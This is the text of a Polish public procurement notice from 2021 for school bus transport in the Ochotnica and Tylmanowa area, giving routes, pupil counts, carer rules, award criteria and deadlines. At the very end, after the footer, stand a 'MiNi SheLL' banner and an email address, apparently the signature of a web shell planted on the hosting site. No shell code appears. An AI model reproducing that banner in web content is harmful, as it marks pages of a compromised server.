Nr 1 w Nowym Targu<br/>Orientacyjna godzina rozpoczynania zajęć: 810<br/>Orientacyjna godzina kończenia zajęć: 1415<br/>Osiedle	Zakładana ilość dzieci korzystających z dowozu<br/>Ligasy	1<br/>Gardonie	1<br/>Równie	1<br/>Młynne	2<br/>Kudowe	2<br/>Gronie	1<br/>Jamne	1<br/>Furcówka	1<br/>RAZEM	10<br/><br/>Trasa przewozów:<br/>- od os. Ligasy, przez Młynne (Chrobaki), Kudowe, Ochotnicę Górną do budynku szkoły w Nowym Targu, drogą powiatowąnr 1637K i drogami gminnymi w os. Młynne i Kudowe, oraz drogą wojewódzką nr 969- długość trasy ok. 48 km w jedną stronę.<br/>Liczba kursów: rano- 1 kurs<br/>po południu: 1 kurs<br/><br/>Uwaga: trasa ta może być realizowana wyłącznie busami o DMC poniżej 7,5t. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">19.4	Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+A<br/>P – ostateczna liczba punktów<br/>C- liczba punktów otrzymana za kryterium cena brutto<br/>A - liczba punktów otrzymanych za kryterium czas podstawienia autobusu/pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu/pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia składa się z 4 oddzielnych zadań, tj.:<br/>Zadanie I<br/>część 1) przewozy uczniów uczęszczających do Szkoły Podstawowej im. Jana Pawła II w Ochotnicy Dolnej;<br/>część 2) przewozy uczniów uczęszczających do Szkoły Podstawowej im. ks. prof. Józefa Tischnera w Ochotnicy Dolnej - Skrodne;<br/>część 3) przewozy uczniów uczęszczających do Szkoły Podstawowej im. Marii Konopnickiej w Ochotnicy Górnej;<br/>Zadanie II - przewozy uczniów uczęszczających do Specjalnego Ośrodka Szkolno-Wychowawczego Nr 1 w Nowym Targu.<br/>Zadanie III - przewozy uczniów uczęszczających do Szkoły Podstawowej im. mjr H. Sucharskiego w Tylmanowej.<br/>Zadanie IV- przewozy uczniów uczęszczających do Niepublicznej Szkoły Podstawowej im. Bohaterów Krwawej Wigilii w Ochotnicy Dolnej - Młynne<br/><br/>Wykonawca zapewni środki transportu wraz z kierowcami posiadającymi stosowne uprawnienia oraz osobami odpowiedzialnymi za opiekę nad dziećmi w trakcie przewozów - w zakresie niezbędnym do prawidłowej realizacji zamówienia.<br/>-Opieka nad przewożonymi dziećmi winna się odbywać przez osobę pełnoletnią, nie karaną za przestępstwo przeciwko dzieciom (zatrudniona na umowę o pracę)<br/>-Osoba sprawująca opiekę nie może być również chora na choroby zakaźne typu gruźlica, padaczka itp.<br/>-Obowiązków tych nie może pełnić osoba kierująca pojazdem.<br/>-Opieka musi być sprawowana podczas trwania każdego kursu, od momentu wejścia dzieci do pojazdu do momentu wejścia dziecka do szkoły, a w drodze powrotnej od momentu wyjścia ze szkoły do momentu odebrania dziecka przez opiekuna<br/><br/>Usługa dowozu dzieci musi odbywać się w pojazdach o dobrym stanie technicznym, które przystosowane są do przewozu dzieci szkolnych - zgodnie z obowiązującymi przepisami.<br/><br/>Na potrzeby niniejszej siwz przyjęto, że w okresie dowożenia, dzieci dowożone będą do szkół w czasie trwania zajęć szkolnych przez maksymalnie 190 dni w jednym roku szkolnym.<br/>Zamawiający zastrzega sobie możliwość rezygnacji z udzielenia części zamówienia.<br/><br/>Poniżej wyszczególniono ilość dzieci korzystających z przewozów w poszczególnych szkołach wraz z miejscem ich zamieszkania (ilości te mogą ulegać zmianie w okresie realizacji zamówienia), a także trasy przewozów oraz ich długość. W długościach tych nie uwzględniono tras dojazdów busów do miejsc rozpoczynanych tras i ich powrotów po odwiezieniu dzieci.<br/>Zadanie III<br/>Szkoła Podstawowa im. mjr H. Sucharskiego w Tylmanowej	<br/><br/>Osiedle	Zakładana ilość dzieci korzystających z dowozu<br/>Kłodne	36<br/>Łęg Górny	5<br/>Brzegi	14<br/>Księżaki	7<br/>Kąt	8<br/>Obłaz Wyżny	1<br/>Kotelnica 1<br/>Miazgi	6<br/>Płaśnie	1<br/>RAZEM	79<br/><br/>Trasa przewozów:<br/>- Od osiedla Kłodne do budynku szkoły, drogą wojewódzką nr 969- długość trasy 3,7 km w jedną stronę. W ramach tej trasy przewożone są dzieci z osiedla Kłodne, Księżaki, Kąt, Obłaz Wyżny, Kotelnica, Miazgi, Płaśnie (60 dzieci)<br/>Liczba kursów: rano- co najmniej 2 kursy<br/> po południu - co najmniej 3 kursy<br/>- Od osiedla Brzegi do budynku szkoły, drogą gminną nr 363949K i drogą wojewódzką nr 969- długość trasy ok 3,3km w jedną stronę. W ramach tej trasy przewożone są dzieci z osiedla Brzegi i Łęg Górny (19 dzieci) <br/>Liczba kursów: rano - 1 kurs<br/> po południu - 1 kurs<br/>Uwaga: trasa ta może być realizowana wyłącznie busami o DMC poniżej 7,5t. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">19.4	Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+A<br/>P – ostateczna liczba punktów<br/>C- liczba punktów otrzymana za kryterium cena brutto<br/>A - liczba punktów otrzymanych za kryterium czas podstawienia autobusu/pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu/pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiot zamówienia składa się z 4 oddzielnych zadań, tj.:<br/>Zadanie I<br/>część 1) przewozy uczniów uczęszczających do Szkoły Podstawowej im. Jana Pawła II w Ochotnicy Dolnej;<br/>część 2) przewozy uczniów uczęszczających do Szkoły Podstawowej im. ks. prof. Józefa Tischnera w Ochotnicy Dolnej - Skrodne;<br/>część 3) przewozy uczniów uczęszczających do Szkoły Podstawowej im. Marii Konopnickiej w Ochotnicy Górnej;<br/>Zadanie II - przewozy uczniów uczęszczających do Specjalnego Ośrodka Szkolno-Wychowawczego Nr 1 w Nowym Targu.<br/>Zadanie III - przewozy uczniów uczęszczających do Szkoły Podstawowej im. mjr H. Sucharskiego w Tylmanowej.<br/>Zadanie IV- przewozy uczniów uczęszczających do Niepublicznej Szkoły Podstawowej im. Bohaterów Krwawej Wigilii w Ochotnicy Dolnej - Młynne<br/><br/>Wykonawca zapewni środki transportu wraz z kierowcami posiadającymi stosowne uprawnienia oraz osobami odpowiedzialnymi za opiekę nad dziećmi w trakcie przewozów - w zakresie niezbędnym do prawidłowej realizacji zamówienia.<br/>-Opieka nad przewożonymi dziećmi winna się odbywać przez osobę pełnoletnią, nie karaną za przestępstwo przeciwko dzieciom (zatrudniona na umowę o pracę)<br/>-Osoba sprawująca opiekę nie może być również chora na choroby zakaźne typu gruźlica, padaczka itp.<br/>-Obowiązków tych nie może pełnić osoba kierująca pojazdem.<br/>-Opieka musi być sprawowana podczas trwania każdego kursu, od momentu wejścia dzieci do pojazdu do momentu wejścia dziecka do szkoły, a w drodze powrotnej od momentu wyjścia ze szkoły do momentu odebrania dziecka przez opiekuna<br/><br/>Usługa dowozu dzieci musi odbywać się w pojazdach o dobrym stanie technicznym, które przystosowane są do przewozu dzieci szkolnych - zgodnie z obowiązującymi przepisami.<br/><br/>Na potrzeby niniejszej siwz przyjęto, że w okresie dowożenia, dzieci dowożone będą do szkół w czasie trwania zajęć szkolnych przez maksymalnie 190 dni w jednym roku szkolnym.<br/>Zamawiający zastrzega sobie możliwość rezygnacji z udzielenia części zamówienia.<br/><br/>Poniżej wyszczególniono ilość dzieci korzystających z przewozów w poszczególnych szkołach wraz z miejscem ich zamieszkania (ilości te mogą ulegać zmianie w okresie realizacji zamówienia), a także trasy przewozów oraz ich długość. W długościach tych nie uwzględniono tras dojazdów busów do miejsc rozpoczynanych tras i ich powrotów po odwiezieniu dzieci.<br/>Zadanie IV<br/>Niepubliczna Szkoła Podstawowa im. Bohaterów Krwawej Wigilii w Ochotnicy Dolnej - Młynne<br/>Orientacyjna godzina rozpoczynania zajęć:800 <br/>Osiedle	Zakładana ilość dzieci korzystających z dowozu<br/>Młynne (od dołu do szkoły)	20<br/>Młynne (od szkoły w górę)	16<br/>RAZEM	36<br/><br/>Trasa przewozów: <br/>- Od początku osiedla Młynne do budynku szkoły, drogą gminną 363888K w os. Młynne- długość trasy ok. 2 km. W ramach tej trasy przewożone są dzieci mieszkające na początku osiedla, w odległości ponad 1 km od szkoły.<br/>Liczba kursów: rano- 1 kurs <br/> po południu- 1 kurs<br/>- Od końca osiedla Młynne (Chrobaki) do budynku szkoły, drogą gminną 363888K w os. Młynne- długość trasy ok 1,5 km w jedną stronę. W ramach tej trasy przewożone są dzieci mieszkające na końcu osiedla Młynne, w odległości ponad 1 km od szkoły.<br/>Liczba kursów: rano- 1 kurs <br/> po południu- 1 kurs </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">60100000-9 - Usługi w zakresie transportu drogowego</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">10 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">19.4	Punktacja końcowa oferty zostanie ustalona jako suma punktów otrzymanych za wszystkie kryteria obliczona wg wzoru P=C+A<br/>P – ostateczna liczba punktów<br/>C- liczba punktów otrzymana za kryterium cena brutto<br/>A - liczba punktów otrzymanych za kryterium czas podstawienia autobusu/pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas podstawienia autobusu/pojazdu zastępczego w przypadku awarii</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki udziału w postępowaniu dotyczące Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów- Wykonawca musi posiadać aktualną na dzień składania ofert oraz ważną przez cały okres obowiązywania umowy licencję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób na terenie RP lub zezwolenie na wykonywanie zawodu przewoźnika drogowego w zakresie krajowego przewozu osób, o których mowa w ustawie z dnia 6 września 2001 r. o transporcie drogowym (tekst jedn. Dz. U. z 2021r., poz. 919 z późn. zm.). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku podstaw wykluczenia Wykonawcy z udziału w postępowaniu o udzielenie zamówienia publicznego, Zamawiający na podstawie §3 Rozporządzenia , będzie żądał dostarczenia: <br/>Oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego. – zgodnie z załącznikiem nr 4 do SWZ.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Wykonawca musi posiadać aktualną na dzień składania ofert oraz ważną przez cały okres obowiązywania umowy licencję na wykonywanie krajowego transportu drogowego w zakresie przewozu osób na terenie RP lub zezwolenie na wykonywanie zawodu przewoźnika drogowego w zakresie krajowego przewozu osób, o których mowa w ustawie z dnia 6 września 2001 r. o transporcie drogowym (tekst jedn. Dz. U. z 2021r., poz. 919 z późn. zm.).</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Nie dotyczy <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem, o którym mowa w art. 125 ust. 1 ustawy także oświadczenie podmiotu udostępniającego zasoby o aktualności informacji zawartych w oświadczeniu, o którym mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez Zamawiającego. <br/>Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności podmiotów realizujących zadania publiczne, o ile wykonawca wskazał w oświadczeniu, o którym mowa w art. 125 ust. 1, dane umożliwiające dostęp do tych środków. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie o którym mowa w pkt. 6 SWZ – w art. 125 ust. 1 ustawy, składane zgodnie z załącznikiem nr 2 do SWZ każdy z Wykonawców. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1.	Zamawiający dopuszcza możliwość zmiany Umowy w przypadkach określonych w art. 455 ust. 1 pkt 2 – 4 i ust. 2 ustawy Pzp oraz przewiduje zgodnie z art. 455 ust. 1 pkt 1) ustawy Pzp możliwość zmiany postanowień Umowy określając następujący rodzaj i zakres oraz warunki zmiany postanowień Umowy:<br/>1)Wynagrodzenia w przypadku:<br/>a) zmiany stawki podatku od towarów i usług (VAT), wynagrodzenie należne Wykonawcy zostanie odpowiednio zmienione w stosunku wynikającym ze zmienionej stawki podatku od towarów i usług (VAT),<br/>b) w przypadku zmiany zakresu świadczenia Umowy w związku z zaistnieniem okoliczności, tj. zaistnienia okoliczności nadzwyczajnych, np. działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych oraz istnieniem/zaistnieniem epidemii/pandemii, klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki, okupacje budowy spowodowane przez osoby inne niż pracownicy Wykonawcy.<br/>2)Terminu realizacji Przedmiotu Umowy:<br/>a) w przypadku niemożności wykonywania przedmiotu Umowy w razie zaistnienia okoliczności nadzwyczajnych, np. działań wojennych, aktów terroryzmu, rewolucji, przewrotu wojskowego lub cywilnego, wojny domowej, skażeń radioaktywnych, termin wykonania przedmiotu Umowy przedłużony zostanie o czas trwania okoliczności nadzwyczajnych uniemożliwiających wykonanie przedmiotu Umowy i - jeśli dotyczy – o czas niezbędny do usunięcia przeszkody uniemożliwiającej wykonanie przedmiotu Umowy, powstałej w związku z okolicznościami nadzwyczajnymi, o których mowa powyżej,<br/>b) w przypadku niemożności wykonywania przedmiotu Umowy w związku z zaistnieniem/istnieniem epidemii/pandemii, klęski żywiołowej, jak huragany, powodzie, trzęsienie ziemi, bunty, niepokoje, strajki, okupacje budowy spowodowane przez osoby inne niż pracownicy Wykonawcy - termin wykonania przedmiotu Umowy przedłużony zostanie o czas trwania okoliczności uniemożliwiających wykonywanie przedmiotu Umowy, o których mowa powyżej i - jeśli dotyczy – o czas niezbędny do usunięcia przeszkody uniemożliwiającej wykonanie przedmiotu Umowy w związku z okolicznościami, o których mowa powyżej.<br/>3) w przypadku zmiany ilości dzieci objętych dowożeniem,<br/>4) w przypadku zmiany ilości dni objętych dowożeniem (niezależnych od Zamawiającego),<br/>5) w przypadku konieczności zmiany tras ze względu na np. nieprzewidziane czynniki pogodowe, czy klęski żywiołowe,<br/>6) w przypadku zmiany przepisów dot. dowożenia dzieci.<br/>2. Strony, w uprzednim uzgodnieniu, dokonają zmian, o których mowa w niniejszym paragrafie, w formie pisemnego aneksu, pod rygorem nieważności.<br/>3. Wszelkie zmiany umowy są dokonywane przez umocowanych przedstawicieli Zamawiającego i Wykonawcy w formie pisemnej w drodze aneksu umowy, pod rygorem nieważności.<br/>4.	W razie wątpliwości, przyjmuje się, że nie stanowią zmiany umowy następujące zmiany:<br/>1)	danych związanych z obsługą administracyjno-organizacyjną umowy,<br/>2)	danych teleadresowych, <br/>3)	danych rejestrowych.<br/>5.	Istotna zmiana zawartej umowy wymaga przeprowadzenia nowego postępowania o udzielenie zamówienia zgodni z art. 454 ustawy Pzp. <br/><br/>Projektowane postanowienia umowy w sprawie zamówienia publicznego, które zostaną wprowadzone do treści tej umowy, w tym ewentualne treści dotyczące zmian do umowy, stanowią załącznik nr 3 do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-08-09 13:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę należy złożyć za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu do dnia 09.08.2021 roku do godz. 13:00.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-08-09 13:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2021-09-07</span></h3></main><footer hidden><table style="border-top: 1px solid black; width:100%"><tr><td>2021-07-30 Biuletyn Zamówień Publicznych</td><td style="text-align:right">Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi</td></tr></table></footer>

Creat By MiNi SheLL
Email: jattceo@gmail.com